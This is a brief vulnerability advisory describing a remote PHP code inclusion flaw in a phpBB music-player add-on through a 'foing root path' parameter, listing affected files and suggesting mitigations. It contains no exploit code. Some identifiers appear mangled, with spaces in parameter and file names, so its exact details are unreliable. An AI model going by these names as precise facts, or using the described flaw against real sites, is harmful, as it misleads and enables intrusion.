020

**Name of the Vulnerable Software and Affected Versions** phpBB (phpbbfm) versions 2021.4.40 and earlier **Description** The issue allows remote attackers to execute arbitrary PHP code via a URL in the `foing root path` parameter in various PHP files, including "faq.php", "index.php", "list.php", "login.php", "playlist.php", "song.php", "gen m3u.php", "view artist.php", "view song.php", "flash/set na.php", "flash/initialise.php", "flash/get song.php", "includes/common.php", "admin/nav.php", "admin/main.php", "admin/list artists.php", "admin/index.php", "admin/genres.php", "admin/edit artist.php", "admin/edit album.php", "admin/config.php", and "admin/admin status.php" in the player/ directory. **Recommendations** For phpBB (phpbbfm) versions 2021.4.40 and earlier, consider disabling the `foing root path` parameter in the affected PHP files until a patch is available. Restrict access to the vulnerable PHP files to minimize the risk of exploitation. Avoid using the `foing root path` parameter in the affected API endpoints until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.